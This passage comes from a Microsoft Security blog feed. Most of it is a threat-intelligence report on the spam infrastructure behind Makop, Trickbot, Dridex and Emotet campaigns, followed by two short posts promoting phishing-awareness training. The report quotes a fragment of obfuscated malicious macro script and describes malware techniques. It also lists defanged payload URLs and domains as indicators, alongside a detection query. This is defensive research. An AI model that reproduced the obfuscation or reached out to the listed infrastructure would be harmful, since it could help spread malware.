  • Dridex campaign delivered through StrangeU and other infra from June to July
  • Dofoil (SmokeLoader) campaign in August
  • Emotet and Dridex activities in September, October, and November

Timeline of campaigns using the StrangeU and RandomU infrastructures

Figure 3. Timeline of campaigns that used StrangeU and RandomU domains

Korean spear-phishing delivers Makop ransomware (April and June 2020)

In early April, StrangeU was used to deliver the Makop ransomware. The emails were sent to organizations that had major business operations in Korea and used names of Korean companies as display names. Signals from Microsoft Defender for Office 365 indicated that these campaigns ran in short bursts.

The emails had .zip attachments containing executables with file names that resembled resumes from job seekers. Once a user opened the attachments, the executables delivered Makop, a ransomware-as-a-service (RaaS) payload that targeted devices and backups.

Upon infection, the malware quickly used the WMI command-line (WMIC) utility and deleted shadow copies. It then used the BCEdit tool and altered the boot configuration to ignore future failures and prevent restoration before encrypting all files and renaming them with .makop extensions.

The second time we observed the campaign almost two months later, in early June, the attackers used a Makop ransomware variant with many modified elements, including added persistence via scripts in the Startup folder before triggering a reboot.

Nearly identical attempts to deliver Makop using resume-based lures were covered by Korean security media during the entire year, using popular mail services through legitimate vendors like Naver and Hanmail. This could indicate that during short bursts the Makop operators were unable to launch their campaigns through legitimate services and had to move to alternate infrastructures like StrangeU instead.

Black Lives Matter lure delivers Trickbot (June 2020)

One campaign associated with the StrangeU infrastructure gained notoriety in mid-June for its lure as well as for delivering the notorious info-stealing malware Trickbot. This campaign circulated emails with malicious Word documents claiming to seek anonymous input on the Black Lives Matter movement.

An initial version of this campaign was observed on June 10 sending emails from a separate, unique attacker-owned mailing infrastructure using .monster domains. However, in the next iteration almost two weeks later, the campaign delivered emails from various domains specifically created with the Black Lives Matter signage, interspersed with StrangeU domains:

  • b-lives-matter[.]site
  • blivesm[.]space
  • blivesmatter[.]site
  • lives-matter-b[.]xyz
  • whoslivesmatter[.]site
  • lives-m-b[.]xyz
  • ereceivedsstrangesecureworld[.]us
  • b-l-m[.]site

Both campaigns carried the same Trickbot payload, operated for two days, and used identical post-execution commands and callouts to compromised WordPress sites.

Once a user opened the document attachment and enabled the malicious macro, Word launched cmd.exe with the command “/c pause” to evade security tools that monitored for successive launches of multiple processes. It then launched commands that deleted proxy settings in preparation for connecting to multiple C2 IP addresses.

Screenshot of malicious document

Figure 4. Screenshot of the malicious document used to deliver Trickbot

The commands also launched rundll32.exe, a native binary commonly used as a living-off-the-land binary, to load a malicious file in memory. The commandeered rundll32.exe also proceeded to perform other tasks using other living-off-the-land binaries, including wermgr.exe and svchost.exe.

In turn, the hijacked wermgr.exe process dropped a file with a .dog extension that appeared to be the Trickbot payload. The same instance of wermgr.exe then appeared to inject code into svchost.exe and scanned for open SMB ports on other devices. The commandeered svchost.exe used WMI to open connections to additional devices on the network, while continuing to collect data from the initial infected device. It also opened multiple browsers on localhost connections to capture browser history and other information via esentutl.exe and grabber_temp.edb, both of which are often used by the Trickbot malware family.

This campaign overwhelmingly targeted corporate accounts in the United States and Canada and avoided individual accounts. Despite heavy media coverage, this campaign was relatively small, reflecting a common behavior among cybercrime groups, which often run multiple, dynamic low-volume campaigns designed to evade resilient detection.

Dridex campaigns big and small (June to July 2020 and beyond)

From late June through July, Dridex operators ran numerous campaigns that distributed Excel documents with malicious macros to infect devices. These operators first delivered emails through the StrangeU infrastructure only, but they quickly started to use compromised email accounts of legitimate organizations as well, preventing defenders from easily blocking deliveries. Despite this, emails from either StrangeU or the compromised accounts had overlapping attributes. For example, many of the emails used the same Reply To addresses that were sourced from compromised individual accounts and not consistent with the sender addresses.

During the bulk of this run, Excel files were attached directly in the email in order to eventually pull the Dridex payload from .xyz domains such as those below. The attackers changed the delivery domains every few days and connected to IP-based C2s on familiar ports like 4664, 3889, 691, and 8443:

  • yumicha[.]xyz
  • rocesi[.]xyz
  • secretpath[.]xyz
  • guruofbullet[.]xyz
  • Greyzone[.]xyz

When opened, the Excel document installed one of a series of custom Dridex executables downloaded from the attacker C2 sites. Like most variants in this malware family, the custom Dridex executables incorporated code loops, time delays, and environment detection mechanisms that evaded numerous public and enterprise sandboxes.

Dridex is known for its capability to perform credential theft and establish connectivity to attacker infrastructure. In this instance, the same Dridex payload was circulated daily using varying lures, often repeatedly to the same organizations to ensure execution on target networks.

During the longer and more stable Excel Dridex campaigns in June and July, a Dridex variant was also distributed in much smaller quantities utilizing Word documents over a one-day period, perhaps testing new evasion techniques. These Word documents, while still delivering Dridex, improved existing obfuscation methods using a unique combination of VBA stomping and replacing macros and function calls with arbitrary text. In a few samples of these documents, we found text from Shakespearean prose.

</ms:script>   
var farewell_and_moon = ["m","a","e","r","t","s",".","b","d","o","d","a"].reverse().join("")   
a_painted_word(120888)   
function as_thy_face(takes_from_hamlet)   
{return new ActiveXObject(takes_from_hamlet)}   
</ms:script>

While Microsoft researchers didn’t observe this portion of the campaign moving into the human-operated phase—targets did not open the attachment—this campaign was likely to introduce tools like PowerShell Empire or Cobalt Strike to steal credentials, move laterally, and deploy ransomware.

Emotet, Dridex, and the RandomU infrastructure (September and beyond)

Despite an errant handful of deliveries distributing Dofoil (also known as SmokeLoader) and other malware, the vast majority of the remaining deliveries through StrangeU have been Dridex campaigns that reoccured every few weeks for a handful of days at a time. These campaigns started on September 7, when RandomU and StrangeU were notably used in a single campaign, after which StrangeU began to see less utilization.

These Dridex campaigns utilized an Emotet loader and initial infrastructure for hosting, allowing the attackers to conduct a highly modular email campaign that delivered multiple distinct links to compromised domains. These domains employed heavy sandbox evasion and are connected by a series of PHP patterns ending in a small subset of options: zxlbw.phpyymclv.phpzpsxxla.php, or app.php. As the campaigns continued, the PHP was dynamically generated, adding other variants, including vary.php, invoice.php, share.php, and many others. Some examples are below.

  • hxxps://molinolafama[.]com[.]mx/app[.]php
  • hxxps://meetingmins[.]com/app[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zxlbw[.]php
  • hxxps://idklearningcentre[.]com[.]ng/zpsxxla[.]php
  • hxxps://idklearningcentre[.]com[.]ng/yymclv[.]php
  • hxxps://hsa[.]ht/yymclv[.]php
  • hxxps://hsa[.]ht/zpsxxla[.]php
  • hxxps://hsa[.]ht/zxlbw[.]php
  • hxxps://contrastmktg[.]com/yymclv[.]php
  • hxxps://track[.]topad[.]co[.]uk/zpsxxla[.]php
  • hxxps://seoemail[.]com[.]au/zxlbw[.]php
  • hxxps://bred[.]fr-authentification-source-no[.]inaslimitada[.]com/zpsxxla[.]php
  • hxxp://www[.]gbrecords[.]london/zpsxxla[.]php
  • hxxp://autoblogsite[.]com/zpsxxla[.]php
  • hxxps://thecrossfithandbook[.]com/zpsxxla[.]php
  • hxxps://mail[.]168vitheyrealestate[.]com/zpsxxla[.]php

In this campaign, sandboxes were frequently redirected to unrelated sites like chemical manufacturers or medical suppliers, while users received an Emotet downloader within a Word document, which once again used macros to facilitate malicious activities.

Screenshot of malicious document

Figure 5. Screenshot of the malicious document used to deliver Dridex

The malicious macro utilized WMI to run a series of standard PowerShell commands. First, it downloaded the executable payload itself by contacting a series of C2 domains associated with Emotet campaigns since July. Afterward, additional encoded PowerShell commands were used in a similar fashion to download a .zip file that contained a Dridex DLL. Additional commands also reached out to a variety of Emotet infrastructure hosted on compromised WordPress administrative pages, even after the Dridex payload has already been downloaded. Dridex then modified RUN keys to automatically start the Dridex executable, which was renamed to riched20.exe on subsequent logons.

We also observed simultaneous connections to associated Dridex and Emotet infrastructure. These connections were largely unencrypted and occurred over a variety of ports and services, including ports 4664 and 9443. At this point the malware had firm presence on the machine, enabling attackers to perform human-operated activity at a later date.

In the past, reports have confirmed Dridex being delivered via leased Emotet infrastructure. There have also been many IP and payload-based associations. This research adds to that body of work and confirms additional associations via namespace, as well as correlation of email lure, metadata, and sender. This iteration of campaign repeated through October to December largely unchanged with nearly identical mails.

Defending organizations against malware campaigns

As attacks continue to grow in modularity, the tactics that attackers use to deliver phishing email, gain initial access on systems, and move laterally will continuously become more varied. This research shows that despite these disparities and the increased resiliency attackers have built, the core tactics and tools that they use are still limited in scope, relying repeatedly on familiar malicious macros, lures, and sending tactics.

Sweeping research into massive attacker infrastructures, as well as our real-time monitoring of malware campaigns and attacker activity, directly inform Microsoft security solutions, allowing us to build or improve protections that block malware campaigns and other email threats, both current and future, as well as provide enterprises with the tools for investigating and responding to email campaigns in real-time.

Microsoft delivers these capabilities through Microsoft Defender for Office 365. Features likes Safe attachments and Safe links ensure real-time, dynamic protection against email campaigns no matter the lure or evasion tactic. These features use a combination of detonation, automated analysis, and machine learning to detect new and unknown threats. Meanwhile, the Campaign view shows the complete picture of email campaigns as they happen, including timelines, sending patterns, impact to the organization, and details like IP addresses, senders, and URLs. These insights into email threats empower security operations teams to respond to attacks, perform additional hunting, and fix configuration issues.

Armed with an advanced solution like Microsoft Defender for Office 365 and the rest of technologies in the broader Microsoft 365 Defender solution, enterprises can further increase resilience against threats by following these recommendations:

  • Educate end users about protecting personal and business information in social media, filtering unsolicited communication, identifying lures in spear-phishing email, and reporting of reconnaissance attempts and other suspicious activity.
  • Configure Office 365 email filtering settings to ensure blocking of phishing & spoofed emails, spam, and emails with malware. Set Office 365 to recheck links on click and delete sent mail to benefit from newly acquired threat intelligence.
  • Disallow macros or allow only macros from trusted locations. See the latest security baselines for Office and Office 365.
  • Turn on AMSI for Office VBA.
  • Check perimeter firewall and proxy to restrict servers from making arbitrary connections to the internet to browse or download files. Turn on network protection to block connections to malicious domains and IP addresses. Such restrictions help inhibit malware downloads and command-and-control activity.

Turning on attack surface reduction rules, including rules that can block advanced macro activity, executable content, process creation, and process injection initiated by Office applications, also significantly improves defenses. The following rules are especially useful in blocking the techniques observed in campaigns using the StrangeU and RandomU infrastructure:

Microsoft 365 customers can also use the advanced hunting capabilities in Microsoft 365 Defender, which integrates signals from Microsoft Defender for Office 365 and other solutions, to locate activities and artifacts related to the infrastructure and campaigns discussed in this blog. These queries can be used with advanced hunting in Microsoft 365 security center, but the same regex pattern can be used on other security tools to identify or block emails.

This query searches for emails sent from StrangeUemail addresses. Run query

EmailEvents   
| where SenderMailFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"   
or SenderFromDomain matches regex @"^(?:eraust|ereply|reply|ereceived|received|reaust|esend|inv|send|emailboost|eontaysstrange|eprop|frost|eont|servicply).*(strange|stange|emailboost).*\.us$"

Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.

 

 

Indicators of compromise

StrangeU domains

esendsstrangeasia[.]us sendsstrangesecuretoday[.]us emailboostgedigital[.]us
emailboostgelife[.]us emailboostgelifes[.]us emailboostgesecureasia[.]us
eontaysstrangeasia[.]us eontaysstrangenetwork[.]us eontaysstrangerocks[.]us
eontaysstrangesecureasia[.]us epropivedsstrangevip[.]us ereplyggstangeasia[.]us
ereplyggstangedigital[.]us ereplyggstangeereplys[.]us ereplyggstangelifes[.]us
ereplyggstangenetwork[.]us ereplyggstangesecureasia[.]us frostsstrangeworld[.]us
servicceivedsstrangevip[.]us servicplysstrangeasia[.]us servicplysstrangedigital[.]us
servicplysstrangelife[.]us servicplysstrangelifes[.]us servicplysstrangenetwork[.]us
ereceivedsstrangesecureworld[.]us ereceivedsstrangetoday[.]us ereceivedsstrangeus[.]us
esendsstrangesecurelife[.]us sendsstrangesecureesendss[.]us ereplysstrangesecureasia[.]us
ereplysstrangesecurenetwork[.]us receivedsstrangesecurelife[.]us ereplysstrangeworld[.]us
reauestysstrangesecurelive[.]us ereceivedsstrangeworld[.]us esendsstrangesecurerocks[.]us
reauestysstrangesecuredigital[.]us reauestysstrangesecurenetwork[.]us reauestysstrangesecurevip[.]us
replysstrangesecurelife[.]us ereauestysstrangesecurerocks[.]us ereceivedsstrangeasia[.]us
ereceivedsstrangedigital[.]us ereceivedsstrangeereceiveds[.]us ereceivedsstrangelife[.]us
ereceivedsstrangelifes[.]us ereceivedsstrangenetwork[.]us ereceivedsstrangerocks[.]us
ereceivedsstrangesecureasia[.]us receivedsstrangeworld[.]us replysstrangedigital[.]us
invdeliverynows[.]us esendsstrangesecuredigital[.]us esendsstrangesecureworld[.]us
sendsstrangesecurenetwork[.]us ereceivedsstrangevip[.]us replysstrangerocs[.]us
replysstrangesecurelive[.]us invpaymentnoweros[.]us invpaymentnowes[.]us
replysstrangeracs[.]us reauestysstrangesecurebest[.]us receivedsstrangesecurebest[.]us
reauestysstrangesecurelife[.]us ereplysstrangevip[.]us reauestysstrangesecuretoday[.]us
ereplysstrangesecureus[.]us ereplysstrangetoday[.]us ereceivedsstrangesecuredigital[.]us
ereceivedsstrangesecureereceiveds[.]us ereceivedsstrangesecurelife[.]us ereceivedsstrangesecurenetwork[.]us
ereceivedsstrangesecurerocks[.]us ereceivedsstrangesecureus[.]us ereceivedsstrangesecurevip[.]us
sendsstrangesecurebest[.]us sendsstrangesecuredigital[.]us sendsstrangesecurelive[.]us
sendsstrangesecureworld[.]us esendsstrangedigital[.]us esendsstrangeesends[.]us
esendsstrangelifes[.]us esendsstrangerocks[.]us esendsstrangesecureasia[.]us
esendsstrangesecureesends[.]us esendsstrangesecurenetwork[.]us esendsstrangesecureus[.]us
esendsstrangesecurevip[.]us esendsstrangevip[.]us ereauestysstrangesecureasia[.]us
ereplysstrangeasia[.]us ereplysstrangedigital[.]us ereplysstrangeereplys[.]us
ereplysstrangelife[.]us ereplysstrangelifes[.]us ereplysstrangenetwork[.]us
ereplysstrangerocks[.]us ereplysstrangesecuredigital[.]us ereplysstrangesecureereplys[.]us
ereplysstrangesecurelife[.]us ereplysstrangesecurerocks[.]us ereplysstrangesecurevip[.]us
ereplysstrangesecureworld[.]us ereplysstrangeus[.]us reauestysstrangesecureclub[.]us
reauestysstrangesecureereauestyss[.]us reauestysstrangesecureworld[.]us receivedsstrangesecureclub[.]us
receivedsstrangesecuredigital[.]us receivedsstrangesecureereceivedss[.]us receivedsstrangesecurelive[.]us
receivedsstrangesecurenetwork[.]us receivedsstrangesecuretoday[.]us receivedsstrangesecurevip[.]us
receivedsstrangesecureworld[.]us replysstrangesecurebest[.]us replysstrangesecureclub[.]us
replysstrangesecuredigital[.]us replysstrangesecureereplyss[.]us replysstrangesecurenetwork[.]us
replysstrangesecuretoday[.]us replysstrangesecurevip[.]us replysstrangesecureworld[.]us
sendsstrangesecurevip[.]us esendsstrangelife[.]us esendsstrangenetwork[.]us
esendsstrangetoday[.]us esendsstrangeus[.]us esendsstrangeworld[.]us
sendsstrangesecureclub[.]us sendsstrangesecurelife[.]us plysstrangelifes[.]us
intulifeinoi[.]us replysstrangerocks[.]us invpaymentnowe[.]us
replysstrangelifes[.]us replysstrangenetwork[.]us invdeliverynowr[.]us
ereceivedggstangevip[.]us ereplyggstangerocks[.]us servicceivedsstrangeworld[.]us
servicplysstrangesecureasia[.]us servicplysstrangeservicplys[.]us emailboostgeasia[.]us
emailboostgeereplys[.]us emailboostgenetwork[.]us emailboostgerocks[.]us
eontaysstrangedigital[.]us eontaysstrangeeontays[.]us eontaysstrangelife[.]us
eontaysstrangelifes[.]us epropivedsstrangeworld[.]us ereceivedggstangeworld[.]us
ereplyggstangelife[.]us frostsstrangevip[.]us servicplysstrangerocks[.]us
invdeliverynow[.]us invpaymentnowlife[.]us invdeliverynowes[.]us
invpaymentnowwork[.]us replysstrangedigitals[.]us replysstrangelife[.]us
replysstrangelifee[.]us replystrangeracs[.]us

RandomU domains

cnewyllansf[.]us kibintiwl[.]us planetezs[.]us sakgeldvi[.]us
rdoowvaki[.]us kabelrandjc[.]us wembaafag[.]us postigleip[.]us
jujubugh[.]us honidefic[.]us utietang[.]us scardullowv[.]us
vorlassebv[.]us jatexono[.]us vlevaiph[.]us bridgetissimema[.]us
schildernjc[.]us francadagf[.]us strgatibp[.]us jelenskomna[.]us
prependerac[.]us oktagonisa[.]us enjaularszr[.]us opteahzf[.]us
skaplyndiej[.]us dirnaichly[.]us kiesmanvs[.]us gooitounl[.]us
izvoznojai[.]us kuphindanv[.]us pluienscz[.]us huyumajr[.]us
arrutisdo[.]us loftinumkx[.]us ffermwyrzf[.]us hectorfranez[.]us
munzoneia[.]us savichicknc[.]us nadurogak[.]us raceaddicteg[.]us
mpixiris[.]us lestenas[.]us collahahhaged[.]us enayilebl[.]us
hotteswc[.]us kupakiliayw[.]us deroutarek[.]us pomagatia[.]us
mizbebzpe[.]us firebrandig[.]us univerzamjw[.]us amigosenrutavt[.]us
kafrdaaia[.]us cimadalfj[.]us ubrzanihaa[.]us yamashumiks[.]us
jakartayd[.]us cobiauql[.]us idiofontg[.]us hoargettattzt[.]us
encilips[.]us dafanapydutsb[.]us intereqr[.]us chestecotry[.]us
diegdoceqy[.]us ffwdenaiszh[.]us sterinaba[.]us wamwitaoko[.]us
peishenthe[.]us hegenheimlr[.]us educarepn[.]us ayajuaqo[.]us
imkingdanuj[.]us dypeplayentqt[.]us traktorkaqk[.]us prilipexr[.]us
collazzird[.]us sentaosez[.]us vangnetxh[.]us valdreska[.]us
mxcujatr[.]us angelqtbw[.]us bescromeobsemyb[.]us hoogametas[.]us
mlitavitiwj[.]us pasgemaakhc[.]us facelijaxg[.]us harukihotarugf[.]us
pasosaga[.]us mashimariokt[.]us vodoclundqs[.]us trofealnytw[.]us
cowboyie[.]us dragovanmm[.]us jonuzpura[.]us cahurisms[.]us
leetzetli[.]us jonrucunopz[.]us flaaksik[.]us wizjadne[.]us
zatsopanogn[.]us roblanzq[.]us barbwirelx[.]us givolettoan[.]us
gyfarosmt[.]us zastirkjx[.]us sappianoyv[.]us noneedfordayvnb[.]us
andreguidiao[.]us concubinsel[.]us meljitebj[.]us alcalizezsc[.]us
springenmw[.]us kongovkamev[.]us starlitent[.]us cassineraqy[.]us
ariankacf[.]us plachezxr[.]us abulpasastq[.]us scraithehk[.]us
wintertimero[.]us abbylukis[.]us lumcrizal[.]us trokrilenyr[.]us
skybdragonqx[.]us pojahuez[.]us rambalegiec[.]us relucrarebk[.]us
vupardoumeip[.]us punicdxak[.]us vaninabaranaogw[.]us yesitsmeagainle[.]us
upcominge[.]us arwresaub[.]us zensimup[.]us joelstonem[.]us
ciflaratzz[.]us adespartc[.]us maaltijdr[.]us acmindiaj[.]us
mempetebyj[.]us itorandat[.]us galenicire[.]us cheldisalk[.]us
zooramawpreahkt[.]us sijamskojoc[.]us fliefedomrr[.]us ascenitianyrg[.]us
tebejavaaq[.]us finnerssshu[.]us slimshortyub[.]us angstigft[.]us
avedaviya[.]us aasthakathykh[.]us nesklonixt[.]us drywelyza[.]us
paginomxd[.]us gathesitehalazw[.]us antinodele[.]us ferestat[.]us
tianaoeuat[.]us pogilasyg[.]us mjawxxik[.]us bertolinnj[.]us
auswalzenna[.]us mmmikeyvb[.]us megafonasgc[.]us litnanjv[.]us
boockmasi[.]us andreillazf[.]us vampirupn[.]us lionarivv[.]us
ihmbklkdk[.]us okergeeliw[.]us forthabezb[.]us trocetasss[.]us
kavamennci[.]us mipancepezc[.]us infuuslx[.]us dvodomnogeg[.]us
zensingergy[.]us eixirienhj[.]us trapunted[.]us greatfutbolot[.]us
porajskigx[.]us mumbleiwa[.]us cilindrarqe[.]us uylateidr[.]us
sdsandrahuin[.]us trapeesr[.]us trauttbobw[.]us bostiwro[.]us
niqiniswen[.]us ditionith[.]us folseine[.]us zamoreki[.]us
sonornogae[.]us xlsadlxg[.]us varerizu[.]us seekabelv[.]us
nisabooz[.]us pohvalamt[.]us inassyndr[.]us ivenyand[.]us
karbonsavz[.]us svunturc[.]us babyrosep[.]us aardigerf[.]us
fedrelandx[.]us degaeriah[.]us detidiel[.]us acuendoj[.]us
peludine[.]us impermatav[.]us datsailis[.]us melenceid[.]us
beshinon[.]us dinangnc[.]us fowiniler[.]us laibstadtws[.]us
bischerohc[.]us muctimpubwz[.]us jusidalikan[.]us peerbalkw[.]us
robesikaton[.]us thabywnderlc[.]us osoremep[.]us krlperuoe[.]us
ntarodide[.]us bideoskin[.]us senagena[.]us kelyldori[.]us
kawtriatthu[.]us rbreriaf[.]us enaqwilo[.]us monesine[.]us
onwinaka[.]us yonhydro[.]us siostailpg[.]us bannasba[.]us
milosnicacz[.]us tunenida[.]us sargasseu[.]us malayabc[.]us
prokszacd[.]us premarketcl[.]us zedyahai[.]us xinarmol[.]us
minttaid[.]us pufuletzpb[.]us nekbrekerdv[.]us ppugsasiw[.]us
katarkamgm[.]us kyraidaci[.]us falhiblaqv[.]us lisusant[.]us
mameriar[.]us quslinie[.]us nirdorver[.]us trocairasec[.]us
pochwikbz[.]us ingykhat[.]us okrzynjf[.]us razsutegayl[.]us
dimbachzx[.]us buchingmc[.]us iessemda[.]us fatarelliqi[.]us
efetivumd[.]us vdevicioik[.]us klumppwha[.]us stefiensi[.]us
donetzbx[.]us wetafteto[.]us denementnd[.]us cyllvysr[.]us
viweewmokmt[.]us destescutyi[.]us craulisrt[.]us maggiebagglesxt[.]us
yawapasaqi[.]us spimilatads[.]us paseadoryy[.]us apageyantak[.]us
magicofaloeaj[.]us prefatoryhe[.]us statvaiq[.]us piketuojaqk[.]us
mushipotatobt[.]us suergonugoy[.]us gummiskoxt[.]us torunikc[.]us
adoleishswn[.]us rovljanie[.]us ivicukfa[.]us vajarelliwe[.]us
burksuit[.]us adoraableio[.]us bassettsz[.]us chevyguyxq[.]us
lunamaosa[.]us telemovelmi[.]us pimptazticui[.]us posteryeiq[.]us
miriamloiso[.]us salahlekajl[.]us inveshilifj[.]us alquicelbi[.]us
hitagjafirt[.]us ohatranqm[.]us scosebexgofxu[.]us vivalasuzyygb[.]us
lugleeghp[.]us alicuppippn[.]us wedutuanceseefv[.]us abnodobemmn[.]us
zajdilxtes[.]us inhaltsqxw[.]us rejtacdat[.]us contunaag[.]us
pitajucmas[.]us delopezmc[.]us donjimafx[.]us iheartcoxlc[.]us
rommelcrxgi[.]us jorguetky[.]us jadesellvb[.]us fintercentrosfs[.]us
ralbarix[.]us kynnirinnty[.]us bibulbio[.]us aspazjagh[.]us
gleboqrat[.]us tensinory[.]us usitniterx[.]us zaretkyui[.]us
hentugustqy[.]us surigatoszuk[.]us nitoeranybr[.]us spitzkopuo[.]us
podkarpatruszz[.]us milfincasqo[.]us datatsbjew[.]us changotme[.]us
losbindebt[.]us ninjachuckvb[.]us desfadavacp[.]us potkazatiun[.]us
sernakct[.]us razmersat[.]us purtinaah[.]us ampiovfa[.]us
durstinyskv[.]us kreukenct[.]us shinanyavc[.]us kolaryta[.]us
yangtsekk[.]us voyagedeviema[.]us elblogdelld[.]us utiligijc[.]us
peaplesokqo[.]us jenggoteq[.]us dogliairler[.]us kandizifb[.]us
flunkmasteraz[.]us clewpossejj[.]us hymgaledaja[.]us gmckayar[.]us
fagordul[.]us pnendickhs[.]us arrogede[.]us stilenii[.]us
cafelireao[.]us poishiuuz[.]us nonfunccoupyo[.]us madrigalbta[.]us
tarad[.]us sarahcp[.]us wickyjr[.]us ghadrn[.]us
sirvond[.]us qumarta[.]us verow[.]us mondeki[.]us
lirana[.]us niarvi[.]us belena[.]us qucono[.]us
ulianag[.]us lenut[.]us shivave[.]us jendone[.]us
seddauf[.]us jarare[.]us uchar[.]us ealesa[.]us
wyoso[.]us marnde[.]us thiath[.]us aulax[.]us
bobelil[.]us jestem[.]us detala[.]us phieyen[.]us
annazo[.]us dilen[.]us jelan[.]us ipedana[.]us
keulsph[.]us ztereqm[.]us rinitan[.]us natab[.]us
haritol[.]us ricould[.]us lldra[.]us miniacs[.]us
zahrajr[.]us cayav[.]us pheduk[.]us qugagad[.]us
dehist[.]us letama[.]us mencyat[.]us vindae[.]us
uranc[.]us handil[.]us galezay[.]us bamerna[.]us
yllyn[.]us ckavl[.]us ilalie[.]us daellee[.]us
cuparoc[.]us zelone[.]us burnile[.]us uloryrt[.]us
shexo[.]us phalbe[.]us hanolen[.]us lorria[.]us
beten[.]us xuserye[.]us iclelan[.]us cwokas[.]us
vesic[.]us ontolan[.]us wajdana[.]us telama[.]us
missani[.]us usinaye[.]us ertanom[.]us kericex[.]us
denaga[.]us tyderq[.]us seliza[.]us kinnco[.]us
qurtey[.]us arzenitlu[.]us vellpoildzu[.]us keityod[.]us
ltangerineldf[.]us lizergidft[.]us serrucheah[.]us lolricelolad[.]us
expiantaszg[.]us hljqfyky[.]us abarrosch[.]us lepestrinynr[.]us
elektroduendevq[.]us waggonbauwh[.]us chaquetzgg[.]us revizijiqa[.]us
ziggyiqta[.]us rokenounkaf[.]us lottemanvl[.]us corsetatsvp[.]us
extasiatny[.]us darkinjtat[.]us pastorsta[.]us sategnaxf[.]us
mordiquedp[.]us mogulanbub[.]us aleesexx[.]us strekktumgz[.]us
kresanike[.]us oberhirtesn[.]us wyddiongw[.]us etherviltjd[.]us
gdinauq[.]us tumisolcv[.]us oardbzta[.]us zamislimrx[.]us
tidifkil[.]us anwirbtda[.]us breliaattainoqt[.]us steinzeitps[.]us
grafoay[.]us shuramiok[.]us sanarteau[.]us jerininomgv[.]us
kusturirp[.]us tenisaragonpu[.]us terquezajf[.]us remularegf[.]us
nobanior[.]us julijmc[.]us dekrapp[.]us odaljenakd[.]us

 

The post What tracking an attacker email infrastructure tells us about persistent cybercriminal operations appeared first on Microsoft Security.

Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity

December 16th, 2020 No comments

The Terranova Security annual Gone Phishing Tournament™ wrapped up in October 2020, spanning 98 countries and industries including healthcare, consumer goods, transport, energy, IT, finance, education, manufacturing, and more. Using templates created from actual phishing attacks created by Microsoft Security, Terranova Security Awareness Training draws on principles of behavioral science to create content that changes user behavior. True to our mission, this year’s results reveal a lot about the state of cybersecurity at the human level—your organization’s first line of defense.

Tournament results

Terranova Security’s Gone Phishing Tournament is a free, annual cybersecurity event that takes place in October to coincide with National Cybersecurity Awareness Month. The Tournament tests real-world responses using a phishing email modeled on actual threats provided by Attack Simulation Training in Microsoft Defender for Office 365 (Office 365 Advanced Threat Protection). Click rates are segmented by industry, organization size, region, web browser, and operating system.

Using a template created from real phishing attacks, translated into 11 languages across 98 countries, the 2020 Gone Phishing Tournament revealed that organizations are taking phishing threats seriously, but with mixed results.

“There’s increasing crossover between our personal and work activities online. That’s why cybersecurity education and training needs to be an ongoing commitment.”—Vasu Jakkal, CVP, Security, Compliance and Identity Marketing, Microsoft

Password submission by industry

Figure 1: Password submission by industry

The average password submission rate across industries was 13.4 percent, with education employees taking the bait least often at just 7.9 percent. The highest password submission rate was among public sector employees at 20.7 percent.

Click and password submission rates by the size of the organization

Figure 2: Click and password submission rates by the size of the organization

The tournament results also showed there was not a great deal of variation when comparing organizations of varied sizes. For example, there was only a 9.2 percent difference in the number of people who clicked the phishing link and submitted passwords at organizations of fewer than 100 people, compared with those consisting of more than 3,000 employees. The results show that phishing attacks are not just a threat for smaller organizations with less sophisticated cybersecurity training—large organizations were even more vulnerable.

Ongoing attacks

In the new world of remote work, your people are your perimeter. Phishing provides hackers with a low-cost, low-risk form of social engineering with a potentially big payoff in the form of stolen passwords, leaked credentials, and access to sensitive data and intellectual property. Throughout 2020, opportunistic cybercriminals have been preying on distracted, overstressed remote workers by introducing COVID-19-themed phishing lures. The World Health Organization (WHO) has referred to the ongoing COVID-19 themed phishing attacks as an “infodemic.” By the summer of 2020, the Federal Trade Commission (FTC) had already recorded over 59,000 coronavirus or stimulus-related complaints resulting in over $74 million in losses.

The National Cyber Security Alliance (NCSA) is pushing back against the rise in cybercrime by building strong public and private partnerships that empower users to stay secure online.

“The Phishing Benchmark Global Report reinforces the need for the current work being done by organizations like Microsoft, Terranova Security, and the National Cyber Security Alliance. Real-world phishing simulations and engaging security awareness training help make organizations, employees, and everyday citizens aware of the growing risk of social engineering and phishing emails. We will continue working in partnership with industry and government to empower the global community towards becoming one that is more cyber aware.”—Kelvin Coleman, Executive Director of NCSA

Not all security awareness training is alike

To defend against increasingly sophisticated cyber threats, organizations need real-world training as a comprehensive internal campaign. Terranova Security Awareness Training includes gamification and interactive sessions designed to engage and can be localized to different geographies around the world.

Attack Simulation Training in Microsoft Defender for Office 365, delivered in partnership with Terranova Security, integrates simulations, training, and reporting. Terranova Security is excited to partner with Microsoft to deliver this differentiated, industry-leading solution, allowing our customers to detect, prioritize, and remediate phishing risk across their organizations. With Attack simulation training, customers can:

  • Simulate real threats: Detect vulnerabilities with real lures and templates—automatically or manually send employees the phishing emails attackers have used against your organization. Then, reach out to users who fall for a phishing lure with personalized training content.
  • Remediate intelligently: Quantify social engineering risks across employees and threat vectors to prioritize remedial training. Track your organization’s progress against a baseline and measure the behavioral impacts. Using user susceptibility metrics triggers automated repeat offender simulations and training for people who need extra attention.
  • Improve security posture: Reinforce your human security system with targeted training designed to change employee behavior. Training can be customized and localized, including simulations tailored to your employee’s contexts—region, industry, function—with granular conditionality on harvesting. Cater to diverse learning styles with interactive nano-learning and micro-learning content.

If there is a common thread to be found in this year’s Gone Phishing Tournament results, it is that organizations of every size need to make integrated attack simulation and training a cornerstone of their cybersecurity program. Cybercriminals do not take days off, and neither should your simulation and training program.

To learn more about Microsoft Security solutions visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Terranova Security Gone Phishing Tournament reveals continued weak spot in cybersecurity appeared first on Microsoft Security.

Why integrated phishing-attack training is reshaping cybersecurity—Microsoft Security

October 5th, 2020 No comments

Phishing is still one of the most significant risk vectors facing enterprises today. Innovative email security technology like Microsoft Defender for Office 365 stops a majority of phishing attacks before they hit user inboxes, but no technology in the world can prevent 100 percent of phishing attacks from hitting user inboxes. At that point in time, your employees become your defenders. They must be trained to recognize and report phishing attacks. But not all training is equally proficient.

